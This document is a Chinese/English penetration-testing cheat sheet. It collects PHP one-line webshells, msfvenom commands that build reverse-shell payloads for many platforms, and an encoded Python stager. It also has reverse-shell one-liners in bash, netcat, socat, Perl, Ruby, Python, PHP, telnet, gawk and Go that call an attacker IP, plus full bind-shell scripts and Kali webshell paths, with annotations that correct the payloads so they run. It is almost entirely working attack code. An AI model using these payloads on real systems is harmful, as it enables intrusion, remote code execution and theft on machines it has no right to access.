Webshell
一句话木马
PHP
# 运行PHP命令
# 文件名:shell.php
# 利用方式:http://example.com/shell.php?cmd=phpinfo();
<?php eval($_REQUEST['cmd']);?>
# Note: $_REQUEST merges GET, POST and COOKIE, so the command can also arrive in a POST body or a cookie and never appear in the URL / access log - check all three when hunting for this.
# 运行系统命令
# 文件名:shell2.php
# 利用方式:http://example.com/shell2.php?lalala=whoami
<?php system($_REQUEST['lalala']);?>
反弹Shell生成
Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
Mac OS
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
Android
# Android payloads are dalvik, not x86: "-a x86" does not match the payload's arch, and "apk" is not a msfvenom output format - the payload already emits an APK on its own. Newer msfvenom versions sign it with a debug key; re-sign it if the target rejects the package.
msfvenom -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -o payload.apk
Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
Linux
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
# pbcopy/pbpaste exist only on macOS; the raw msfvenom output has no active "<?php" open tag, so prepend one portably instead:
printf '<?php ' | cat - shell.php > payload.php
ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
JSP
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
WAR
# The original line had "- o" (typo) and "-f raw", which writes a bare JSP rather than a deployable WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f war -o payload.war
NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js
Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py
生成编码后的文件:
import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo='))
Base64解码后 (note: the blob above actually encodes the address as '0.0.0.0', not 'x.x.x.x' - put the handler's IP into the script and re-encode it before use):
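import socket
import struct


def _recv_exact(sock, n):
    """Read exactly ``n`` bytes from ``sock`` and return them.

    Raises EOFError if the peer closes the connection first. The original
    loop compared ``len(d) != l`` after each ``recv(4096)``: a closed socket
    returns b"" and spun it forever, and a recv that overshot ``l`` could
    never make the two lengths equal again.
    """
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = sock.recv(min(remaining, 4096))
        if not chunk:
            raise EOFError("peer closed after %d of %d bytes" % (n - remaining, n))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


# Placeholder address: the base64 one-liner above hard-codes 0.0.0.0 here.
# socket.socket(2, 1) in the original is AF_INET / SOCK_STREAM written as ints.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("x.x.x.x", 2333))
# Stage protocol: a 4-byte big-endian length, then that many bytes of Python
# source, exec'd with the live socket bound as `s`. Nothing authenticates the
# peer - whatever answers on that port gets code execution in this process.
l = struct.unpack(">I", _recv_exact(s, 4))[0]
d = _recv_exact(s, l)
exec(d, {"s": s})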
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl
Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
Lua
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua
Windows Shellcode
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Linux Shellcode
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Mac Shellcode
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
自动化Payload生成工具
https://github.com/Screetsec/TheFatRat
常用反弹Shell
Bash Reverse Shell
# Not a working shell on its own: "0&0" just backgrounds "exec /bin/bash 0" and nothing is connected to a listener - use one of the /dev/tcp forms below.
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
socat Reverse Shell
# The space before ",pty" in the copied line splits the address into two arguments; the option list must be attached directly to exec:'bash -i':
socat tcp:ATTACKING-IP:PORT exec:'bash -i',pty,stderr,setsid,sigint,sane &
Golang Reverse Shell
# "http://cmd.Run()" in the copied one-liner is an auto-link artifact; it must read cmd.Run(). Replace 127.0.0.1:1337 with the handler's address.
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
PHP Reverse Shell
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
# (Assumes TCP uses file descriptor 3. If it doesn\'t work, try 4,5, or 6)
# In the copied line the unescaped "ATTACKING IP" terminated the PHP string; the placeholder must sit inside the string:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKING-IP/443 0>&1'");?>
<?=$x=explode(\'~\',base64_decode(substr(getallheaders()[\'x\'],1)));@$x[0]($x[1]);
# The listing below is a truncated excerpt of the msfvenom php/meterpreter_reverse_tcp stager (several statements are missing mid-line) and "<? php" with a space is not a valid open tag - regenerate it with the msfvenom PHP command above instead of copying it:
<? php error_reporting(0); $ip = \'x.x.x.x\'; $port = 53; if (($f = \'stream_socket_client\') && is_callable($f)) { {$port}"); $s_type = \'stream\'; } if (!$s && ($f = \'fsockopen\') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case \'socket\': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[\'msgsock\'] = $s; $GLOBALS[\'msgsock_type\'] = $s_type; if (extension_loaded(\'s >
<?php
$sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3");
?>
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
# The copied line appears to have lost "</tmp/p | /bin/sh 1>" to HTML tag stripping; the working form is:
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p
Another which works well for OpenBSD netcat rather than GNU nc:
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
Node.js Reverse Shell
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');
Telnet Reverse Shell
# Same HTML-stripping damage as the netcat variant; restored form:
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p
# Needs two listeners on the attacker side: port 80 feeds commands in, port 443 receives the output.
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows Reverse Shell
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# The next line is the Unix variant repeated from above: it exec's /bin/sh and will not work on Windows.
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java (Groovy) Reverse Shell - the snippet below is Groovy syntax ("as String[]", untyped assignments), e.g. for a Jenkins-style script console, not compilable plain Java
// Groovy, not plain Java: `as String[]` and the `\$` escape inside a
// double-quoted GString are Groovy syntax. The bash one-liner is passed
// through unchanged: fd 5 is the TCP connection, each line read from it is
// run and its output sent back on the same descriptor.
def argv = ["/bin/bash", "-c", "exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]
r = Runtime.getRuntime()
p = r.exec(argv)
p.waitFor()   // block until the shell exits
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
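import socket
import struct
import time

# Placeholders: set to the handler's address and port before use.
HOST = "x.x.x.x"
PORT = 2333
CONNECT_ATTEMPTS = 10
RETRY_DELAY = 5  # seconds to wait after a failed connect


def _connect_with_retry(host, port, attempts=CONNECT_ATTEMPTS, delay=RETRY_DELAY):
    """Return a TCP socket connected to ``(host, port)``, retrying on failure.

    Tries up to ``attempts`` times, sleeping ``delay`` seconds after each
    failed attempt. Raises the last connect error once every attempt has
    failed; the original fell through with a never-connected socket and died
    with an unrelated error at the first recv(). Only socket errors are
    retried - the original bare ``except:`` also swallowed Ctrl-C.
    """
    last_error = None
    for _ in range(attempts):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((host, port))
            return sock
        except socket.error as exc:
            last_error = exc
            sock.close()
            time.sleep(delay)
    if last_error is None:
        raise ValueError("attempts must be at least 1")
    raise last_error


def _recv_exact(sock, n):
    """Read exactly ``n`` bytes from ``sock`` and return them.

    Raises EOFError if the peer closes the connection first; the original
    ``while len(d) < l`` loop spun forever on the empty recv() a closed
    socket returns.
    """
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = sock.recv(min(remaining, 4096))
        if not chunk:
            raise EOFError("peer closed after %d of %d bytes" % (n - remaining, n))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    # Stage protocol: a 4-byte big-endian length, then that many bytes of
    # Python source, exec'd with the live socket bound as `s`. Nothing
    # authenticates the peer - whatever answers on that port gets code
    # execution in this process.
    s = _connect_with_retry(HOST, PORT)
    l = struct.unpack(">I", _recv_exact(s, 4))[0]
    d = _recv_exact(s, l)
    exec(d, {"s": s})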
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect((\'x.x.x.x\',2333))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Bind Shell
关于交互式正向连接shell,几点需要注意的地方:
-
不管在linux还是windows下,想要做到交互式,只能开启一个Shell。不能够每次接收到命令就再开启一个新的shell进程,然后执行。
-
Windows下cmd.exe /K参数是保持cmd不结束,/c参数是执行完后就结束,注意区别。
Windows版本
from socket import *
import subprocess
import os, threading
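def send(talk, proc):
    """Pump the child's stdout to the client socket, one line at a time.

    Args:
        talk: the connected client socket.
        proc: a subprocess.Popen whose ``stdout`` is a pipe.

    Returns when the child closes its stdout (readline() yields an empty
    string); the original looped forever sending empty messages at EOF.
    Returns quietly if the client has gone away and the send fails - the
    main loop notices the disconnect on its own recv().
    """
    while True:
        line = proc.stdout.readline()
        if not line:
            break  # EOF: the shell exited
        try:
            talk.sendall(line)  # send() may write only part of a line
        except (OSError, IOError):
            break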
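if __name__ == "__main__":
    # Unauthenticated bind shell: whoever reaches TCP/23333 first gets cmd.exe.
    # 0.0.0.0 listens on every interface.
    server = socket(AF_INET, SOCK_STREAM)
    server.bind(("0.0.0.0", 23333))
    server.listen(5)
    print("waiting for connect")
    talk, addr = server.accept()
    print("connect from %s" % (addr,))
    # One long-lived cmd.exe (/K keeps it open); every received chunk is fed
    # to its stdin. stderr is merged into stdout: the original left it as a
    # PIPE nobody read, which stalls cmd.exe once the pipe buffer fills.
    proc = subprocess.Popen("cmd.exe /K", stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                            shell=True)
    pump = threading.Thread(target=send, args=(talk, proc))
    pump.daemon = True  # dies with the main thread
    pump.start()
    try:
        while True:
            cmd = talk.recv(1024)
            if not cmd:
                break  # client disconnected; the original spun forever here
            proc.stdin.write(cmd)
            proc.stdin.flush()
    finally:
        # The original server.close() sat after an endless loop and never ran.
        proc.stdin.close()
        if proc.poll() is None:
            proc.terminate()
        talk.close()
        server.close()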
Linux版本
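from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
    # Unauthenticated bind shell on every interface: whoever connects first
    # to TCP/11 gets /bin/sh. Binding a port below 1024 needs root.
    server = socket(AF_INET, SOCK_STREAM)
    server.bind(("0.0.0.0", 11))
    server.listen(5)
    print("waiting for connect")
    talk, addr = server.accept()
    print("connect from %s" % (addr,))
    # The socket is handed to the child as its stdio directly (Popen only
    # needs fileno()), so no pump thread is required. shell=True is dropped:
    # with shell=True and a list, "-i" became $0 of the wrapper shell rather
    # than the interactive flag, so the client got a non-interactive sh.
    proc = subprocess.Popen(["/bin/sh", "-i"], stdin=talk, stdout=talk, stderr=talk)
    talk.close()    # the child holds its own copies of the descriptors
    server.close()
    proc.wait()     # stay around until the shell exits instead of orphaning it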
执行后主动连接即可
Gawk Reverse Shell
gawk 'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'
#!/usr/bin/gawk -f
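# Unauthenticated bind shell: gawk listens on TCP/8080 on every interface
# ("/inet/tcp/LPORT/0/0") and runs each received line through sh, sending
# the output back over the same connection.
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            # getline returning <= 0 means the client went away. The original
            # ignored that: `cmd` kept its last value and was re-run into the
            # dead socket instead of waiting for the next client.
            if ((Service |& getline cmd) <= 0)
                break
            if (cmd) {
                # 2>&1 so the command's stderr reaches the client rather than
                # gawk's own stderr, which the client never sees.
                shell = cmd " 2>&1"
                while ((shell |& getline) > 0)
                    print $0 |& Service
                close(shell)
            }
        } while (cmd != "exit")
        close(Service)
    }
}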
Kali Web Shells
以下脚本保存在Kali Linux的 /usr/share/webshells/ 目录中(本节后面的路径也都是 webshells,原文的 webshell 少了结尾的 s),只有在可以上传、注入、传输到目标机的情况下才可以使用。
Kali PHP Web Shells
php-reverse-shell.php
Pen Test Monkey – PHP Reverse Shell
php-findsock-shell.php
& findsock.c
Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c
(be mindful of the target server's architecture), execute with netcat, not a browser: nc -v target 80
simple-backdoor.php
PHP backdoor, useful for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
php-backdoor.php
Larger PHP shell, with a text input box for command execution.
Kali Perl Reverse Shell
perl-reverse-shell.pl
Pen Test Monkey – Perl Reverse Shell
perlcmd.cgi
Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd
Kali Cold Fusion Shell
cfexec.cfm
Cold Fusion Shell – aka CFM Shell
Kali ASP Shell
Classic ASP Reverse Shell + CMD shells: /usr/share/webshells/asp/
Kali ASPX Shells
ASP.NET reverse shells within Kali: /usr/share/webshells/aspx/
Kali JSP Reverse Shell
Kali JSP Reverse Shell: /usr/share/webshells/jsp/jsp-reverse.jsp